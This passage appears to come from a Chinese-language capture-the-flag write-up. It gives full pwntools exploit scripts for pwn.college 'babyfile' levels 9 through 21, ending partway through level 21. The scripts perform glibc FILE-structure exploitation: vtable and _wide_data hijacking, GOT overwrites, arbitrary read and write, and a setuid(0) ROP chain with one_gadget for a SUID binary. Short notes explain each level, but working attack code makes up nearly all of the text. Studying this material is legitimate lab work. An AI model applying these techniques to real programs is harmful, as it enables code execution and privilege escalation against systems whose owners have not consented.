    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b"libc is: ")
    libc = int(target.recvline().strip(), 16) - 0x84420
    __GI__IO_wfile_overflow = libc + 0x1E8DC0

    target.recvuntil(b"writing to: ")
    buf = int(target.recvline().strip(), 16)

    target.success(f"libc: {hex(libc)}")
    target.success(f"buf: {hex(buf)}")

    fp = FileStructure()
    fp._lock = buf
    fp._wide_data = buf
    fp.vtable = __GI__IO_wfile_overflow
    fp.chain = elf.sym["win"]

    payload = flat(
        bytes(fp),
        buf,
    )

    raw_input("DEBUG")
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Level 9

Information

Category: Pwn

Description

Create a fake _wide_data struct to hijack control of the virtual function table of a built-in FILE struct.

Write-up

做 flag 梦，下 flag 雨（

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level9"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b"libc is: ")
    libc = int(target.recvline().strip(), 16) - 0x84420
    __GI__IO_wfile_overflow = libc + 0x1E8DC0

    target.recvuntil(b"_IO_read_ptr")
    buf = int(target.recvline().strip()[-14:], 16) - 0x83

    target.success(f"libc: {hex(libc)}")
    target.success(f"buf: {hex(buf)}")

    fp = FileStructure()
    fp._lock = buf
    fp._wide_data = buf
    fp.vtable = __GI__IO_wfile_overflow
    fp.chain = elf.sym["authenticate"] + 0x25

    payload = flat(
        bytes(fp),
        buf,
    )
    raw_input("DEBUG")
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Level 10

Information

Category: Pwn

Description

Create a fake _wide_data struct to hijack control of the virtual function table of a FILE struct.

Write-up

呜呜呜，他甚至在汇编层隐藏了作弊检测（

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level10"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b"libc is: ")
    libc = int(target.recvline().strip(), 16) - 0x84420
    __GI__IO_wfile_overflow = libc + 0x1E8DC0

    target.recvuntil(b"writing to: ")
    buf = int(target.recvline().strip(), 16)

    target.success(f"libc: {hex(libc)}")
    target.success(f"buf: {hex(buf)}")

    fp = FileStructure()
    fp.flags = b"password"
    fp._lock = buf + 0xE8
    fp._wide_data = buf
    fp.vtable = __GI__IO_wfile_overflow
    fp.chain = elf.sym["authenticate"]

    payload = flat(
        bytes(fp),
        buf,
    )
    raw_input("DEBUG")
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Level 11

Information

Category: Pwn

Description

Apply FILE struct exploits to leak a secret value.

Write-up

不好啦，开始结合堆利用啦，感觉要开始变难了……

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level11"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def new_note(size):
    target.sendlineafter(b"> ", b"new_note")
    target.sendlineafter(b"> ", str(size).encode())


def del_note():
    target.sendlineafter(b"> ", b"del_note")


def write_note(content):
    target.sendlineafter(b"> ", b"write_note")
    target.send(content)


def read_note():
    target.sendlineafter(b"> ", b"read_note")


def open_file():
    target.sendlineafter(b"> ", b"open_file")


def close_file():
    target.sendlineafter(b"> ", b"close_file")


def write_file():
    target.sendlineafter(b"> ", b"write_file")


def write_fp(payload):
    target.sendlineafter(b"> ", b"write_fp")
    target.send(payload)


def quit():
    target.sendlineafter(b"> ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    secret = 0x404100

    new_note(0x10)
    open_file()

    fp = FileStructure()
    fp.flags = 0x800
    fp._IO_read_end = secret
    fp._IO_write_base = secret
    fp._IO_write_ptr = secret + 0x100
    fp.fileno = 1
    payload = flat(fp.struntil("_flags2"))

    raw_input("DEBUG")
    write_fp(payload)
    write_file()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 12

Information

Category: Pwn

Description

Apply FILE struct exploits to write data to bypass a security check.

Write-up

越来越简单，梦回幼儿园（

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level12"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def new_note(idx, size):
    target.sendlineafter(b"> ", b"new_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.sendlineafter(b"> ", str(size).encode())


def del_note(idx):
    target.sendlineafter(b"> ", b"del_note")
    target.sendlineafter(b"> ", str(idx).encode())


def write_note(idx, content):
    target.sendlineafter(b"> ", b"write_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def read_note(idx, content):
    target.sendlineafter(b"> ", b"read_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def open_file():
    target.sendlineafter(b"> ", b"open_file")


def close_file():
    target.sendlineafter(b"> ", b"close_file")


def read_file(idx):
    target.sendlineafter(b"> ", b"read_file")
    target.sendlineafter(b"> ", str(idx).encode())


def write_fp(payload):
    target.sendlineafter(b"> ", b"write_fp")
    target.send(payload)


def auth():
    target.sendlineafter(b"> ", b"authenticate")


def quit():
    target.sendlineafter(b"> ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b"located at: ")
    elf.address = int(target.recvline().strip(), 16) - 0x205D
    authenticate = elf.address + 0x5170

    target.success(f"pie: {hex(elf.address)}")
    target.success(f"authenticate: {hex(authenticate)}")

    open_file()

    fp = FileStructure()
    fp.read(authenticate, 0x10)
    payload = flat(fp.struntil("_IO_save_base"))

    # raw_input("DEBUG")
    write_fp(payload)
    new_note(0, 0x8)
    raw_input("DEBUG")
    read_file(0)
    auth()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 13

Information

Category: Pwn

Description

Apply FILE struct exploits to write data and hijack control flow.

Write-up

Level 12: When using close_file, be cautious of double free or invalid pointer issues.<br /> Level 13: To resolve issues with stdin breaking after using close_file, consider alternative methods to get an arbitrary read without using close_file.<br /> Level 13: One approach is to perform a leak using write_file and an overwrite using read_file.

感觉 Level 12 和 Level 13 我打的都是非预期 o_O

~~求漂亮小姐姐浇浇 fclose 怎么利用……~~

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level13"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def new_note(idx, size):
    target.sendlineafter(b"> ", b"new_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.sendlineafter(b"> ", str(size).encode())


def del_note(idx):
    target.sendlineafter(b"> ", b"del_note")
    target.sendlineafter(b"> ", str(idx).encode())


def write_note(idx, content):
    target.sendlineafter(b"> ", b"write_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def read_note(idx, content):
    target.sendlineafter(b"> ", b"read_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def open_file():
    target.sendlineafter(b"> ", b"open_file")


def close_file():
    target.sendlineafter(b"> ", b"close_file")


def write_file(idx):
    target.sendlineafter(b"> ", b"write_file")
    target.sendlineafter(b"> ", str(idx).encode())


def read_file(idx):
    target.sendlineafter(b"> ", b"read_file")
    target.sendlineafter(b"> ", str(idx).encode())


def write_fp(payload):
    target.sendlineafter(b"> ", b"write_fp")
    target.send(payload)


def quit():
    target.sendlineafter(b"> ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b"is: ")
    stack = int(target.recvline().strip(), 16)

    target.success(f"stack: {hex(stack)}")

    open_file()

    fp = FileStructure()
    fp.write(stack - 0x50, 0x100)
    payload = flat(fp.struntil("_flags2"))

    write_fp(payload)

    new_note(0, 0x10)
    write_file(0)
    target.recvlines(4)
    fp_addr = int.from_bytes(target.recv(0x8), "little") - 0x1E0

    target.recv(0x68)
    libc = int.from_bytes(target.recv(0x8), "little") - 0x1ED6A0
    __GI__IO_wfile_overflow = libc + 0x1E8DC0

    target.recv(0x48)
    elf.address = int.from_bytes(target.recv(0x8), "little") - 0x2200

    target.success(f"libc: {hex(libc)}")
    target.success(f"pie: {hex(elf.address)}")
    target.success(f"fp: {hex(fp_addr)}")

    fp = FileStructure()
    fp._lock = fp_addr
    fp._wide_data = fp_addr
    fp.vtable = __GI__IO_wfile_overflow
    fp.chain = elf.sym["win"]
    payload = flat(
        bytes(fp),
        fp_addr,
    )

    write_fp(payload)

    # raw_input("DEBUG")
    write_file(0)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 14

Information

Category: Pwn

Description

Apply FILE struct exploits to write data to hijack control flow.. again?

Write-up

这题泄漏了栈地址，有 fread，所以直接让它写返回地址就好了，多跑几次，$1/16$ 概率成功。我不知道有没有别的打法，提示说 close_file 可能比较有用，不懂，这个预期解到底是啥，我不知道……

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level14"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def new_note(idx, size):
    target.sendlineafter(b"> ", b"new_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.sendlineafter(b"> ", str(size).encode())


def del_note(idx):
    target.sendlineafter(b"> ", b"del_note")
    target.sendlineafter(b"> ", str(idx).encode())


def write_note(idx, content):
    target.sendlineafter(b"> ", b"write_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def read_note(idx, content):
    target.sendlineafter(b"> ", b"read_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def open_file():
    target.sendlineafter(b"> ", b"open_file")


def close_file():
    target.sendlineafter(b"> ", b"close_file")


def read_file(idx):
    target.sendlineafter(b"> ", b"read_file")
    target.sendlineafter(b"> ", str(idx).encode())


def write_fp(payload):
    target.sendlineafter(b"> ", b"write_fp")
    target.send(payload)


def quit():
    target.sendlineafter(b"> ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b"is: ")
    stack = int(target.recvline().strip(), 16)
    ret = stack + 0x98

    target.success(f"stack: {hex(stack)}")

    open_file()

    fp = FileStructure()
    fp.read(ret, 0x3)
    payload = flat(fp.struntil("_flags2"))

    write_fp(payload)

    new_note(0, 0x2)
    # raw_input("DEBUG")
    read_file(0)

    payload = flat(
        b"\xc9\x03",
    )
    target.send(payload)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 15

Information

Category: Pwn

Description

Apply FILE struct exploits to overwrite a GOT entry.

Write-up

比上题简单，直接改 GOT 表。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level15"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def new_note(idx, size):
    target.sendlineafter(b"> ", b"new_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.sendlineafter(b"> ", str(size).encode())


def del_note(idx):
    target.sendlineafter(b"> ", b"del_note")
    target.sendlineafter(b"> ", str(idx).encode())


def write_note(idx, content):
    target.sendlineafter(b"> ", b"write_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def read_note(idx, content):
    target.sendlineafter(b"> ", b"read_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def open_file():
    target.sendlineafter(b"> ", b"open_file")


def close_file():
    target.sendlineafter(b"> ", b"close_file")


def read_file(idx):
    target.sendlineafter(b"> ", b"read_file")
    target.sendlineafter(b"> ", str(idx).encode())


def write_fp(payload):
    target.sendlineafter(b"> ", b"write_fp")
    target.send(payload)


def quit():
    target.sendlineafter(b"> ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    open_file()

    fp = FileStructure()
    fp.read(elf.got["printf"], 0x9)
    payload = flat(fp.struntil("_flags2"))

    write_fp(payload)

    new_note(0, 0x8)
    # raw_input("DEBUG")
    read_file(0)

    payload = flat(
        elf.sym["win"],
    )
    target.send(payload)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 16

Information

Category: Pwn

Description

Apply FILE struct exploits to overwrite a built-in FILE struct and print the flag.

Write-up

泄漏了 libc，可以算出 stdout，所以使 fread 从 stdin 向 stdout 读，然后修改 stdout 输出缓冲区。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level16"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def new_note(idx, size):
    target.sendlineafter(b"> ", b"new_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.sendlineafter(b"> ", str(size).encode())


def del_note(idx):
    target.sendlineafter(b"> ", b"del_note")
    target.sendlineafter(b"> ", str(idx).encode())


def write_note(idx, content):
    target.sendlineafter(b"> ", b"write_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def read_note(idx, content):
    target.sendlineafter(b"> ", b"read_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def open_file():
    target.sendlineafter(b"> ", b"open_file")


def close_file():
    target.sendlineafter(b"> ", b"close_file")


def read_file(idx):
    target.sendlineafter(b"> ", b"read_file")
    target.sendlineafter(b"> ", str(idx).encode())


def write_fp(payload):
    target.sendlineafter(b"> ", b"write_fp")
    target.send(payload)


def quit():
    target.sendlineafter(b"> ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    secret = 0x405100

    target.recvuntil(b"is: ")
    libc.address = int(target.recvline().strip(), 16) - 0x84420
    stdout = libc.sym["_IO_2_1_stdout_"]

    target.success(f"libc: {hex(libc.address)}")
    target.success(f"stdout: {hex(stdout)}")

    open_file()

    fp = FileStructure()
    fp.read(stdout, 0x78)

    payload = flat(fp.struntil("_flags2"))

    write_fp(payload)

    stdout = FileStructure()
    stdout.write(secret, 0x100)

    payload = flat(stdout.struntil("_flags2"))

    new_note(0, 0x70)
    raw_input("DEBUG")
    read_file(0)

    raw_input("DEBUG")
    target.send(payload)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 17

Information

Category: Pwn

Description

Apply FILE struct exploits to read/write data and capture the flag.

Write-up

没办法泄漏任何地址，咋办嘞？又回到了 glibc 堆分配机制问题上来…… fopen 会 malloc 一块 File Structure buffer，而 fclose 会 free 掉 fopen 分配的 buffer，那么，我们只要先调用 open_file fopen 一个文件，它会设置 fp，然后调用 close_file 释放，再打开包含 flag 的文件，此时这个 fopen 会复用之前的地址，由于 close 的时候没有清空 fp 指针，所以此时 fp 指向我们的 flag 结构体，之后我们就可以把 flag 内容搞到用户分配的 buffer 中了，最后篡改 fp 的 fileno 为 stdout，调用 write_file 会将 buffer 内容写到这个 fp 的 fileno 中，成功泄漏 flag。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level17"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def new_note(idx, size):
    target.sendlineafter(b"> ", b"new_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.sendlineafter(b"> ", str(size).encode())


def del_note(idx):
    target.sendlineafter(b"> ", b"del_note")
    target.sendlineafter(b"> ", str(idx).encode())


def write_note(idx, content):
    target.sendlineafter(b"> ", b"write_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def read_note(idx, content):
    target.sendlineafter(b"> ", b"read_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def open_file():
    target.sendlineafter(b"> ", b"open_file")


def close_file():
    target.sendlineafter(b"> ", b"close_file")


def read_file(idx):
    target.sendlineafter(b"> ", b"read_file")
    target.sendlineafter(b"> ", str(idx).encode())


def write_file(idx):
    target.sendlineafter(b"> ", b"write_file")
    target.sendlineafter(b"> ", str(idx).encode())


def write_fp(payload):
    target.sendlineafter(b"> ", b"write_fp")
    target.send(payload)


def open_flag():
    target.sendlineafter(b"> ", b"open_flag")


def quit():
    target.sendlineafter(b"> ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    open_file()
    close_file()
    open_flag()
    new_note(0, 0x100)
    read_file(0)

    fp = FileStructure()
    fp.write(0, 0x100)
    payload = flat(fp.struntil("_flags2"))

    # raw_input("DEBUG")
    write_fp(payload)
    write_file(0)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 18

Information

Category: Pwn

Description

Apply FILE struct exploits to arbitrarily read/write data or hijack control flow.

Write-up

没开 PIE 有 fwrite 且可篡改 fp 那还不是轻轻松松？

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level18"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def new_note(idx, size):
    target.sendlineafter(b"> ", b"new_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.sendlineafter(b"> ", str(size).encode())


def del_note(idx):
    target.sendlineafter(b"> ", b"del_note")
    target.sendlineafter(b"> ", str(idx).encode())


def write_note(idx, content):
    target.sendlineafter(b"> ", b"write_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def read_note(idx, content):
    target.sendlineafter(b"> ", b"read_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.send(content)


def open_file():
    target.sendlineafter(b"> ", b"open_file")


def close_file():
    target.sendlineafter(b"> ", b"close_file")


def write_file(idx):
    target.sendlineafter(b"> ", b"write_file")
    target.sendlineafter(b"> ", str(idx).encode())


def write_fp(payload):
    target.sendlineafter(b"> ", b"write_fp")
    target.send(payload)


def open_flag():
    target.sendlineafter(b"> ", b"open_flag")


def quit():
    target.sendlineafter(b"> ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    open_file()

    fp = FileStructure()
    fp.write(elf.bss(), 0x150)
    payload = flat(fp.struntil("_flags2"))

    write_fp(payload)

    new_note(0, 0x10)
    write_file(0)

    target.recvlines(4)
    libc = int.from_bytes(target.recv(0x8), "little") - 0x1ED6A0
    __GI__IO_wfile_overflow = libc + 0x1E8DC0

    target.recv(0x140)
    fp_ptr = int.from_bytes(target.recv(0x8), "little")

    target.success(f"libc: {hex(libc)}")
    target.success(f"fp: {hex(fp_ptr)}")

    fp = FileStructure()
    fp._lock = fp_ptr
    fp._wide_data = fp_ptr
    fp.vtable = __GI__IO_wfile_overflow
    fp.chain = elf.sym["win"]
    payload = flat(
        bytes(fp),
        fp_ptr,
    )

    write_fp(payload)

    new_note(0, 0x100)
    raw_input("DEBUG")
    write_file(0)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 19

Information

Category: Pwn

Description

Apply FILE struct exploits to arbitrarily read/write data or hijack control flow.

Write-up

笑死了，说明我上一题是非预期解，咋一看和上题没啥区别啊，删了点功能而已，但是被删的功能我一个也没用上，测试直接用上题一样的 exp，通了……

所以这题的耗时大概是 30s，~~这 30s 是我和 IDA 姐姐谈心的时间（bushi~~

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level19"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def new_note(idx, size):
    target.sendlineafter(b"> ", b"new_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.sendlineafter(b"> ", str(size).encode())


def del_note(idx):
    target.sendlineafter(b"> ", b"del_note")
    target.sendlineafter(b"> ", str(idx).encode())


def open_file():
    target.sendlineafter(b"> ", b"open_file")


def close_file():
    target.sendlineafter(b"> ", b"close_file")


def write_file(idx):
    target.sendlineafter(b"> ", b"write_file")
    target.sendlineafter(b"> ", str(idx).encode())


def write_fp(payload):
    target.sendlineafter(b"> ", b"write_fp")
    target.send(payload)


def open_flag():
    target.sendlineafter(b"> ", b"open_flag")


def quit():
    target.sendlineafter(b"> ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    open_file()

    fp = FileStructure()
    fp.write(elf.bss(), 0x150)
    payload = flat(fp.struntil("_flags2"))

    write_fp(payload)

    new_note(0, 0x10)
    write_file(0)

    target.recvlines(4)
    libc = int.from_bytes(target.recv(0x8), "little") - 0x1ED6A0
    __GI__IO_wfile_overflow = libc + 0x1E8DC0

    target.recv(0x140)
    fp_ptr = int.from_bytes(target.recv(0x8), "little")

    target.success(f"libc: {hex(libc)}")
    target.success(f"fp: {hex(fp_ptr)}")

    fp = FileStructure()
    fp._lock = fp_ptr
    fp._wide_data = fp_ptr
    fp.vtable = __GI__IO_wfile_overflow
    fp.chain = elf.sym["win"]
    payload = flat(
        bytes(fp),
        fp_ptr,
    )

    write_fp(payload)

    new_note(0, 0x100)
    raw_input("DEBUG")
    write_file(0)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 20

Information

Category: Pwn

Description

Apply various FILE struct exploits to obtain a leak, then hijack hijack control flow.

Write-up

别告诉我我打了两道非预期 o_O

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level20"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def new_note(idx, size):
    target.sendlineafter(b"> ", b"new_note")
    target.sendlineafter(b"> ", str(idx).encode())
    target.sendlineafter(b"> ", str(size).encode())


def del_note(idx):
    target.sendlineafter(b"> ", b"del_note")
    target.sendlineafter(b"> ", str(idx).encode())


def open_file():
    target.sendlineafter(b"> ", b"open_file")


def close_file():
    target.sendlineafter(b"> ", b"close_file")


def write_file(idx):
    target.sendlineafter(b"> ", b"write_file")
    target.sendlineafter(b"> ", str(idx).encode())


def write_fp(payload):
    target.sendlineafter(b"> ", b"write_fp")
    target.send(payload)


def open_flag():
    target.sendlineafter(b"> ", b"open_flag")


def quit():
    target.sendlineafter(b"> ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    open_file()

    fp = FileStructure()
    fp.write(elf.bss(), 0x270)
    payload = flat(fp.struntil("_flags2"))

    write_fp(payload)

    new_note(0, 0x10)
    raw_input("DEBUG")
    write_file(0)

    target.recvlines(4)
    libc = int.from_bytes(target.recv(0x8), "little") - 0x1ED6A0
    __GI__IO_wfile_overflow = libc + 0x1E8DC0

    target.recv(0x260)
    fp_ptr = int.from_bytes(target.recv(0x8), "little")

    target.success(f"libc: {hex(libc)}")
    target.success(f"fp: {hex(fp_ptr)}")

    fp = FileStructure()
    fp._lock = fp_ptr
    fp._wide_data = fp_ptr
    fp.vtable = __GI__IO_wfile_overflow
    fp.chain = elf.sym["win"]
    payload = flat(
        bytes(fp),
        fp_ptr,
    )

    write_fp(payload)

    new_note(0, 0x100)
    raw_input("DEBUG")
    write_file(0)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 21

Information

Category: Pwn

Description

Apply FILE struct exploits to obtain the flag.

Write-up

这才是真正的 FSOP。程序正常返回，或 abort 或 exit 后都会调用 _IO_flush_all_lockp，它会刷新 _IO_list_all 中的每一个结构体，调用其 vatble 指向的函数。这道题只会刷新 stderr（因为程序关闭了 stdout 和 stdin），然后调用 stderr 的 vtable 指向的函数，老样子，让 vtable 去执行 __GI__IO_wfile_overflow，然后它调用 _IO_wdoallocbuf，之后这个东西又去调用 stderr 的 _wide_data 加上某个偏移处的内容。所以我们可以直接让其调用 one_gadget，可是真的那么简单吗？

注意这题是有 SUID 的，直接调用 one_gadget 可以拿到 shell 但是不能 cat /flag，所以我们需要一个 ROP Chain 先执行 setuid(0) 然后再去执行 one_gadget。这是这题的另一处难点，因为正常只能返回到某条指令，我们控制不了后续执行的内容以及栈内容。我的解决方案是 stack pivot 到 stderr，充分利用这个结构体构造 ROP Chain，之后就能发现这题设计的真的非常巧妙，不管是多一个还是少一个字节都不行 orz

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level21"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b" is: ")
    libc.address = int(target.recvline().strip(), 16) - 0x84420
    __GI__IO_wfile_overflow = libc.address + 0x1E8DE0
    stderr = libc.sym["_IO_2_1_stderr_"]

    target.success(f"libc: {hex(libc.address)}")
    target.success(f"stderr: {hex(stderr)}")

    one_gadget = libc.address + 0xE3B01
    pop_rdi_ret = libc.address + 0x128B8D
    leave_ret = libc.address + 0x578C8

    fp = FileStructure()
    fp._IO_read_ptr = pop_rdi_ret
    fp._IO_read_end = 0
    fp._IO_read_base = libc.sym["setuid"]
    fp._IO_write_ptr = one_gadget + 1
    fp._IO_write_base = one_gadget
    fp._lock = stderr + 0x10
    fp._wide_data = stderr - 0x48
